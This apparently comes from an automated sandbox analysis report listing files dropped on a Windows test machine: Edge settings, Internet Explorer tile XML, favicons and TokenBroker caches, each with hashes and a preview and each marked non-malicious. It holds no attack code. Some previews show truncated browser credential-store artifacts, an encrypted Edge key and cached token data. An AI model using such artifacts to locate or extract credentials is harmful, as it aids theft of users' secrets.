                                Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAADi3P1FI9wIQpckKbHwXhRjEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAADzNuOLP35QNUWfOLaAgGz8YgONSe4BeQZ5No4iKuXj9gAAAAA

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ea859c87-9c63-4135-b042-d58da91b9efc.tmp

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):24929
                                Entropy (8bit):6.065622114602607
                                Encrypted:false
                                SSDEEP:768:PM7X2zt1jOXtXi3zDr7Z6TH+iFlWuhuatPo:PMSzMtXijv7CFlDu6A
                                MD5:E225B1F909EA19813C0C61806620E34D
                                SHA1:10671C34FA8D1544DE577CBE535A135ABB70617F
                                SHA-256:1060AE039F8FFA375E2C4801C07AE02D332EBAF8E3E86BD7AF91B58D2A66552D
                                SHA-512:F00C6F68AC2F352765E5087C141166D74B805BC06B2486D9AD5DE6B065A539D2838A00D84DB2EB58B12874A31B498ECE5BD98F6D647F08A727E2D565EAA1BB86
                                Malicious:false
                                Preview:{"abusive_adblocker_etag":"\"6299A61D48C25647EA67BB9AD1ED65CD4AE48010AACD34D9F797A4A16B03B527\"","apps_count_check_time":"13361265752358297","browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM4+RiU6+CjD0kb+pHz7rRm3rXSyzABnWdKBG+Ijlx7hEE4QTzo+AB6fnDLLJBpo7PKv8Ob367/KjUg8mcY6CmCjTJCmtsWFOcUf5vj04cw0e1yZe2WAl8svFn5IC43jfc+dLnGrEyDwAicHCxNdhlrVa5LEtTgt5u2lAK02pd1

                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml

                                Download File
                                Process:C:\Program Files\Internet Explorer\iexplore.exe
                                File Type:XML 1.0 document, ASCII text, with very long lines (313), with CRLF line terminators
                                Category:dropped
                                Size (bytes):355
                                Entropy (8bit):5.081737633410355
                                Encrypted:false
                                SSDEEP:6:TMVBdc9EMdLD5Ltqc41EPKLJmrm5VYLaTD90/QL3WIZK0QhPPwGVDHkEtMjwu:TMHdNMNxOEyFym5VYunWimI00OYGVbkt
                                MD5:9662B4AF979A05454FBE51A750F8ED35
                                SHA1:6942663C49A181214BAA07C02F9195DED2F00A7A
                                SHA-256:70B616E7EA3A594EF7A2191AB449FD0A6B9FAE041720C5B9F4533B7091066B9D
                                SHA-512:47BB5E42DF977981C9ECF82E1D450B91A240A3084348FDDE9BFB083BD80AC73956DD9E1485317CBB3586CF0CB7A6CF5F42B76F2A53ADE5520596C7CE65792D37
                                Malicious:false
                                Preview:<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x1619a1f6,0x01dab001</date><accdate>0x161c1774,0x01dab001</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig>..

                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml

                                Download File
                                Process:C:\Program Files\Internet Explorer\iexplore.exe
                                File Type:XML 1.0 document, ASCII text, with very long lines (311), with CRLF line terminators
                                Category:dropped
                                Size (bytes):353
                                Entropy (8bit):5.108623070672766
                                Encrypted:false
                                SSDEEP:6:TMVBdc9EMdLD5Ltqc4fLGTkgyJm6taTD90/QL3WIZK0QhPPwGkI5kU5EtMjwu:TMHdNMNxe2kgEWnWimI00OYGkak6EtMb
                                MD5:531E8167FE607D24164117E1798276BF
                                SHA1:290727F6A90F8BB8932A564D13AF649333A1D789
                                SHA-256:D43DEAB5E3AF2B79F78B21716E0D87CCF90F8B5498D9221186CD622069886F44
                                SHA-512:22A281E278EBE9EDDE3C99F0D0E97917E536DC8AD275BBBD6158B42940B54F35C92073AD310975308E734958E0D72D72F69B50125D63733E2C8DB35B7B488637
                                Malicious:false
                                Preview:<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x16060098,0x01dab001</date><accdate>0x16086303,0x01dab001</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Amazon.url"/></tile></msapplication></browserconfig>..

                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml

                                Download File
                                Process:C:\Program Files\Internet Explorer\iexplore.exe
                                File Type:XML 1.0 document, ASCII text, with very long lines (317), with CRLF line terminators
                                Category:dropped
                                Size (bytes):359
                                Entropy (8bit):5.114777616195062
                                Encrypted:false
                                SSDEEP:6:TMVBdc9EMdLD5Ltqc4GLMJmdyaTD90/QL3WIZK0QhPPwGyhBcEEtMjwu:TMHdNMNxvLyinWimI00OYGmZEtMb
                                MD5:98F70CD9CF2AD3E6918CDBE3D26BC15F
                                SHA1:7FB85BFDD3A40BEF9AA0E128152C0FB2A982B5B4
                                SHA-256:38DEF4335CF0E869F2A2070F8E1B85609A4D3729511E2B32250A072CE9AB74C4
                                SHA-512:1E9BF0848DFF6122CF2D476C8132B5964C6FA8826163726A01C913BD2B5E973EDB1E9036296EBCDA489E33892B47D70C33C8D6F1A99239F2E9F1386BE5ADF667
                                Malicious:false
                                Preview:<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x1620d433,0x01dab001</date><accdate>0x162440ca,0x01dab001</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Wikipedia.url"/></tile></msapplication></browserconfig>..

                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-314712940\msapplication.xml

                                Download File
                                Process:C:\Program Files\Internet Explorer\iexplore.exe
                                File Type:XML 1.0 document, ASCII text, with very long lines (334), with CRLF line terminators
                                Category:dropped
                                Size (bytes):376
                                Entropy (8bit):5.1685447184144655
                                Encrypted:false
                                SSDEEP:6:TMVBdc9EMdLD5Ltq08eDPOOKaihMTtJminaTD90/QL3WIZK0QhPPwGcE5EtMjwu:TMHdNMNxtDPOOKavfanWimI00OYGcE5t
                                MD5:86B11F66283AF0CC065DCF7B95FB011D
                                SHA1:6E4986905B9D4BA16547562B1B6A7ECB77B9A30B
                                SHA-256:92EF80F7DB704B96CE0E8C4A94E874E714B1127428D9C111951C300693FD442F
                                SHA-512:ECA351B1DE683486804800BBFB2B5BA6F7924D6104385A23E1E7588DF8301E964121B72081CB29A59458DD0FC6A8E397F5806B317C1668D1E5ADFE42A1DD1BF8
                                Malicious:false
                                Preview:<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://go.microsoft.com/fwlink/p/?LinkId=255142"/><date>0x16086303,0x01dab001</date><accdate>0x160ac525,0x01dab001</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Bing.url"/></tile></msapplication></browserconfig>..

                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml

                                Download File
                                Process:C:\Program Files\Internet Explorer\iexplore.exe
                                File Type:XML 1.0 document, ASCII text, with very long lines (307), with CRLF line terminators
                                Category:dropped
                                Size (bytes):349
                                Entropy (8bit):5.111652486374828
                                Encrypted:false
                                SSDEEP:6:TMVBdc9EMdLD5Ltqc4J2wLJmxEVENaTD90/QL3WIZK0QhPPwGgE5EtMjwu:TMHdNMNxivFUEVE0nWimI00OYGd5EtMb
                                MD5:C8078A930ED270D8AE9FD0E22695FAD2
                                SHA1:709F6786332F01A9B550C40E900265454478F99C
                                SHA-256:0369EC2B9CA920BA84610871824240914EBE76AA3CB5BD9E496213598F51FE72
                                SHA-512:1308CD8BA4B9005A227904BA63A2DDDCAEB9368D5407ECD8CA1F41036C7576AAB9757357419F3D300867BB323E5A3146FB0E0B4170D3CCCF2899679E90872E46
                                Malicious:false
                                Preview:<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x160f89df,0x01dab001</date><accdate>0x1612b5e8,0x01dab001</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Live.url"/></tile></msapplication></browserconfig>..

                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xml

                                Download File
                                Process:C:\Program Files\Internet Explorer\iexplore.exe
                                File Type:XML 1.0 document, ASCII text, with very long lines (313), with CRLF line terminators
                                Category:dropped
                                Size (bytes):355
                                Entropy (8bit):5.117832580175709
                                Encrypted:false
                                SSDEEP:6:TMVBdc9EMdLD5Ltqc4UxGwHIJm1IaTD90/QL3WIZK0QhPPwG8K0QU5EtMjwu:TMHdNMNxhGwmQnWimI00OYG8K075EtMb
                                MD5:C93144BB3D220D339E1EEA527B5919CB
                                SHA1:03FEF5B33DA729DEFC16DB54652987DC4A075032
                                SHA-256:2B83954B9015FACD6FBFC24E51534A0A61CC37EF6192CDFC508F7CB7E6DF8416
                                SHA-512:A03AEE35F33F91D98D813C369246FA9E9FFB4F4ECCAC56BA9A72FC96349422A8768A25C7657725BA2A34675537624855170454C4227C26529D775EE9DD748061
                                Malicious:false
                                Preview:<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x16280dd2,0x01dab001</date><accdate>0x16280dd2,0x01dab001</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig>..

                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml

                                Download File
                                Process:C:\Program Files\Internet Explorer\iexplore.exe
                                File Type:XML 1.0 document, ASCII text, with very long lines (311), with CRLF line terminators
                                Category:dropped
                                Size (bytes):353
                                Entropy (8bit):5.08852636738433
                                Encrypted:false
                                SSDEEP:6:TMVBdc9EMdLD5Ltqc4QunBu2BLJm/u2BLaTD90/QL3WIZK0QhPPwGAkEtMjwu:TMHdNMNx0nBu2BFmu2BunWimI00OYGxt
                                MD5:9DDCDC3CAD846734D6C985937B337F73
                                SHA1:41A51946135314DD7EE7DE792DA54F6DF7952C55
                                SHA-256:DD965629438B926B6A2EAB9AA15BDE047669E7AD4AE6FC68726AA2C2EA59E52A
                                SHA-512:41937B6A3F2B26C46A74F3EB00B4DBEB0FB580397A80A38A3432D27C7C523CF434152E2F7AFFBB1D33750D691429DF63D6E00FC92169E9C415283466BB0D08B0
                                Malicious:false
                                Preview:<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x1617788f,0x01dab001</date><accdate>0x1617788f,0x01dab001</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Reddit.url"/></tile></msapplication></browserconfig>..

                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xml

                                Download File
                                Process:C:\Program Files\Internet Explorer\iexplore.exe
                                File Type:XML 1.0 document, ASCII text, with very long lines (313), with CRLF line terminators
                                Category:dropped
                                Size (bytes):355
                                Entropy (8bit):5.1378829681059095
                                Encrypted:false
                                SSDEEP:6:TMVBdc9EMdLD5Ltqc4oTfwJmpwaTD90/QL3WIZK0QhPPwG6Kq5EtMjwu:TMHdNMNxxfuWpnWimI00OYG6Kq5EtMb
                                MD5:24FD9952EA3030E87C7609FBC0FB8CEE
                                SHA1:D612863DE06287526571714210067E0D63CFBA9C
                                SHA-256:B7642E60C1CDC777E37676D8ABD524D20A66D022D9B4D54C4E2A234FD66503D3
                                SHA-512:AB1E9C3CFBED5EDF558DB105980AA4BA8E45FD5206180A5CF931CB35B4D4AF7473C059F011DAED3C299947AC5683046E035B58F39D594C5C731B6112FD9C36D9
                                Malicious:false
                                Preview:<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x16148f4a,0x01dab001</date><accdate>0x16148f4a,0x01dab001</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\NYTimes.url"/></tile></msapplication></browserconfig>..

                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20332743330\msapplication.xml

                                Download File
                                Process:C:\Program Files\Internet Explorer\iexplore.exe
                                File Type:XML 1.0 document, ASCII text, with very long lines (315), with CRLF line terminators
                                Category:dropped
                                Size (bytes):357
                                Entropy (8bit):5.091636012921118
                                Encrypted:false
                                SSDEEP:6:TMVBdc9EMdLD5Ltqc4YX2n0nJmH+LaTD90/QL3WIZK0QhPPwG02CqEtMjwu:TMHdNMNxc0JXunWimI00OYGVEtMb
                                MD5:6B094EBC09EFFEE034AE20BC9F21F477
                                SHA1:8C3853F476D7DEF012FEF95F3973E47FC1E25C3C
                                SHA-256:84E5C4EE49E5F6A0C8584AAF325A22E9576A99C29019CA2DE559DFDF4BD4EF10
                                SHA-512:DF5DC3154F7DF71EDFCC9AF207152641B6EA3E650FA936518C40D99B1E1A85D1D971BB7D3BB797B733C8FEF864DE26207BFB1CEA2951764D4CC550B6EF87BDF8
                                Malicious:false
                                Preview:<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x160ac525,0x01dab001</date><accdate>0x160d27ad,0x01dab001</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig>..

                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin8215062560\msapplication.xml

                                Download File
                                Process:C:\Program Files\Internet Explorer\iexplore.exe
                                File Type:XML 1.0 document, ASCII text, with very long lines (311), with CRLF line terminators
                                Category:dropped
                                Size (bytes):353
                                Entropy (8bit):5.084123820441461
                                Encrypted:false
                                SSDEEP:6:TMVBdc9EMdLD5Ltqc4InB+LJmYwLaTD90/QL3WIZK0QhPPwGiwE5EtMjwu:TMHdNMNxfncFounWimI00OYGe5EtMb
                                MD5:7EC4291FBCAA64146B855BA316E1875F
                                SHA1:26B3EF001F22E2004EE0F2302B6A2A30E2C68986
                                SHA-256:2E33E4E255F418B260B0EF3C31F41005DDF5953A20F58715336F06A8BEBA912F
                                SHA-512:D43BB4C961F8859F6B3E18B9F32BD7D7D1F0C8981B4CC4880AE7BEC08CC5A3655A270C4498CDF79B23B9177E250264972521280D05554F451BF59473F09276BB
                                Malicious:false
                                Preview:<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x160d27ad,0x01dab001</date><accdate>0x160f89df,0x01dab001</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Google.url"/></tile></msapplication></browserconfig>..

                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\phb851g\imagestore.dat

                                Download File
                                Process:C:\Program Files\Internet Explorer\iexplore.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):866
                                Entropy (8bit):7.169026556584067
                                Encrypted:false
                                SSDEEP:24:kUvF/6easyD/iCHLSWWqyCoTTdTc+yhaX4b9upG+:kUt/6symC+PTCq5TcBUX4bs
                                MD5:BB497071B4DEAC1373FF569EC7531E57
                                SHA1:220E02ACDB1FBD95A4657894524D225F86443D52
                                SHA-256:2F8482F85A3E58E5B558F015BFAA025FBCC7F6FAA9E14F1151586FBC23B138ED
                                SHA-512:382858DC2891CCC5D08FE40CE997ECBAE23C5EAD0E834AA0486C42A7243C2AE27F4E6E1D1D581CB396E635AA7598153BA51FA0A886854A395D175D80571320D0
                                Malicious:false
                                Preview:..........h.t.t.p.s.:././.w.w.w...m.s.n...c.o.m./.f.a.v.i.c.o.n...i.c.o......PNG........IHDR... ... ............pHYs.................vpAg... ... ........eIDATH...o.@../..MT..KY..P!9^....:UjS..T."P.(R.PZ.KQZ.S. ....,v2.^.....9/t....K..;_ }'.....~..qK..i.;.B..2.`.C...B........<...CB.....).....;..Bx..2.}.. ._>w!..%B..{.d...LCgz..j/.7D.*.M.*.............'.HK..j%.!DOf7......C.]._Z.f+..1.I+.;.Mf....L:Vhg..[.. ..O:..1.a....F..S.D...8<n.V.7M.....cY@.......4.D..kn%.e.A.@lA.,>\.Q|.N.P........<.!....ip...y..U....J...9...R..mgp}vvn.f4$..X.E.1.T...?.....'.wz..U...../[...z..(DB.B(....-........B.=m.3......X...p...Y........w..<.........8...3.;.0....(..I...A..6f.g.xF..7h.Gmq|....gz_Z...x..0F'..........x..=Y}.,jT..R......72w/...Bh..5..C...2.06`........8@A..."zTXtSoftware..x.sL.OJU..MLO.JML.../.....M....IEND.B`. ... ...........e+Tf....e+Tf....

                                C:\Users\user\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.dat

                                Download File
                                Process:C:\Windows\explorer.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):1019
                                Entropy (8bit):5.236946495216897
                                Encrypted:false
                                SSDEEP:24:YqHZ6T06Mhm4ymNib0O0bihmCetmKg6CUXyhmimKgbxdB6hmjmKgz0JahmcmKgbR:YqHZ6T06McoEb0O0bicCewHDUXycLHbR
                                MD5:5D20D9B3F928AC964E07C561FD8A3F42
                                SHA1:B702BE149FCF94831A975F2CD06B2DFE020D9632
                                SHA-256:59A4F22870D7A7DC3339917C89FF6AF09FA762AF39F0624338FDDFF631730492
                                SHA-512:30E5F275FFB475A403439C3A4DCC05F3E12A6914D93F20EB38AF3240A7F693A455C25C005A3681AB39C89BFAD9AE66FAAE3874B987FAC48BB6A5439194FDCEDC
                                Malicious:false
                                Preview:{"RecentItems":[{"AppID":"Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge","PenUsageSec":15,"LastSwitchedLowPart":7763552,"LastSwitchedHighPart":31061488,"PrePopulated":true},{"AppID":"Microsoft.WindowsCommunicationsApps_8wekyb3d8bbwe!Microsoft.WindowsLive.Mail","PenUsageSec":15,"LastSwitchedLowPart":4292730848,"LastSwitchedHighPart":31061487,"PrePopulated":true},{"AppID":"Microsoft.Office.OneNote_8wekyb3d8bbwe!microsoft.onenoteim","PenUsageSec":15,"LastSwitchedLowPart":4282730848,"LastSwitchedHighPart":31061487,"PrePopulated":true},{"AppID":"Microsoft.Windows.Photos_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":4272730848,"LastSwitchedHighPart":31061487,"PrePopulated":true},{"AppID":"Microsoft.MSPaint_8wekyb3d8bbwe!Microsoft.MSPaint","PenUsageSec":15,"LastSwitchedLowPart":4262730848,"LastSwitchedHighPart":31061487,"PrePopulated":true},{"AppID":"Microsoft.WindowsMaps_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":4252730848,"LastSwitchedHighPart":31061487,"Pr

                                C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):2278
                                Entropy (8bit):3.865628495745988
                                Encrypted:false
                                SSDEEP:48:uiTrlKxrgxsSxl9Il8uV1j5lxy+8Q139SS8r+5MVRoid1rc:mf2Y7lxy+L3IS8rhVRC
                                MD5:244E8F33BFB35B131AAC0DD0C72ED836
                                SHA1:0D138A8E3B8741BB846140897FCEAC9A769AE10D
                                SHA-256:E6447790EB077ECDD096AA58357C7CAF3EDAEFBFBF0899EEC5D423330D3BF8F2
                                SHA-512:C6E351B5CEB32080D9AD1C7D461C2A6E68E95D0E2F9F900D2BC6272950861093AFBBC4A0D38FC38DAE0112D91EA388977828670A9D78BC2D5BCC4E678F69A090
                                Malicious:false
                                Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.N.i.C.c.w.m.w.2.g.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.4.t.z.9.R.S.

                                C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\cf7513a936f7effbb38627e56f8d1fce10eb12cc.tbres

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):4622
                                Entropy (8bit):4.00060295402022
                                Encrypted:false
                                SSDEEP:96:VYH1rWqtb/0oyhKhxeOYMCNDY9GI8ycMu0pV6DFolkksjpGq13C:Vert9yshxM5OGrPMuwV6ql2jpy
                                MD5:97587F4697A72D4BB7CEAF0EB320D709
                                SHA1:F819CEF5606A1D0F6E6D615EC3B73CCF21CB5DB5
                                SHA-256:49FC0B31BC3567CAB6A6AD1AC6EFE609B11B80D3F3F1B20909CDA1127BC9FC36
                                SHA-512:FDCEFD3B464D7353CD008942E3F4D9AA74E33396090E9D55F71E0BE3A997BB75136DC785F0139921F5B99C80A16FCB8AB7CC6B2A3A31BE5329DEBA3D09BE1A5D
                                Malicious:false
                                Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".n.q.y.G.W.A.G.w.2.g.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.4.t.z.9.R.S.

                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\favicon[1].ico

                                Download File
                                Process:C:\Program Files\Internet Explorer\iexplore.exe
                                File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                Category:dropped
                                Size (bytes):4286
                                Entropy (8bit):3.8046022951415335
                                Encrypted:false
                                SSDEEP:24:suZOWcCXPRS4QAUs/KBy3TYI42Apvl6wheXpktCH2Yn4KgISQggggFpz1k9PAYHu:HBRh+sCBykteatiBn4KWi1+Ne
                                MD5:DA597791BE3B6E732F0BC8B20E38EE62
                                SHA1:1125C45D285C360542027D7554A5C442288974DE
                                SHA-256:5B2C34B3C4E8DD898B664DBA6C3786E2FF9869EFF55D673AA48361F11325ED07
                                SHA-512:D8DC8358727590A1ED74DC70356AEDC0499552C2DC0CD4F7A01853DD85CEB3AEAD5FBDC7C75D7DA36DB6AF2448CE5ABDFF64CEBDCA3533ECAD953C061A9B338E
                                Malicious:false
                                Preview:...... .... .........(... ...@..... ...................................................................................................................................................................................................N...Sz..R...R...P...N..L..H..DG..........................................................................................R6..U...U...S...R...P...N..L..I..F..B...7...............................................................................S6..V...V...U...S...R...P...N..L..I..F..C...?..:z......................................................................O...W...V...V...U...S...R...P...N..L..I..E..C...?...;..{7..q2$..............................................................T..D..]...S)..p6..J...R...P...N..L..I..E..B..>..;..z7..p2..f,X.........................................................A..O#..N!..N!..N!..P$..q:...P...N..K..I..E..A..=..9..x5..n0..e,...5...................................................Ea.Z,..T$..T$..T

                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\favicon[1].ico

                                Download File
                                Process:C:\Program Files\Internet Explorer\iexplore.exe
                                File Type:PNG image data, 32 x 32, 8-bit/color RGB, non-interlaced
                                Category:dropped
                                Size (bytes):758
                                Entropy (8bit):7.432323547387593
                                Encrypted:false
                                SSDEEP:12:6v/792/6TCfasyRmQ/iyzH48qyNkWCj7ev50C5qABOTo+CGB++yg43qX4b9uTmMI:F/6easyD/iCHLSWWqyCoTTdTc+yhaX4v
                                MD5:84CC977D0EB148166481B01D8418E375
                                SHA1:00E2461BCD67D7BA511DB230415000AEFBD30D2D
                                SHA-256:BBF8DA37D92138CC08FFEEC8E3379C334988D5AE99F4415579999BFBBB57A66C
                                SHA-512:F47A507077F9173FB07EC200C2677BA5F783D645BE100F12EFE71F701A74272A98E853C4FAB63740D685853935D545730992D0004C9D2FE8E1965445CAB509C3
                                Malicious:false
